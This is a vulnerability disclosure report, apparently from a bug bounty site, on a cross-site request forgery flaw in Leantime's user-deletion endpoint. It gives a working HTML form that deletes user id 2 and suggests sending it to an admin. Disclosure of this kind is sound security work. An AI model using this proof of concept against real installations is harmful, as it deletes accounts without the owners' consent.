Cross-Site Request Forgery (CSRF) in leantime/leantime
Aug 17th 2021
CSRF on deleting a user. There is no token or anti csrf implemented.
🕵️♂️ Proof of Concept
Create a .html file (poc.html) for example and copy paste the following code in it. Change localhost to ur domain or ip address.
<html><head> <title>CSRF PoC</title> </head><body> <form action="http://localhost/users/delUser/2" method="POST"> <input type="text" name="del" value="Yes%252C+delete%2521" /><br /> <input type='submit' value='Go!' /> </form> </body></html>
send this file to a admin when he opens the file the user with id 2 is getting deleted instantly. see the screenshot where there are still two users.
screenshot when the admin decides to click on it
after clicking on Go, the next screen is showed where the user with id 2 (test) no longer exists.
This vulnerability is capable of deleting an user account. If you send the admin the link and he clicks on it the user will be deleted instantly because there is no csrf protection. With this attack you can delete users.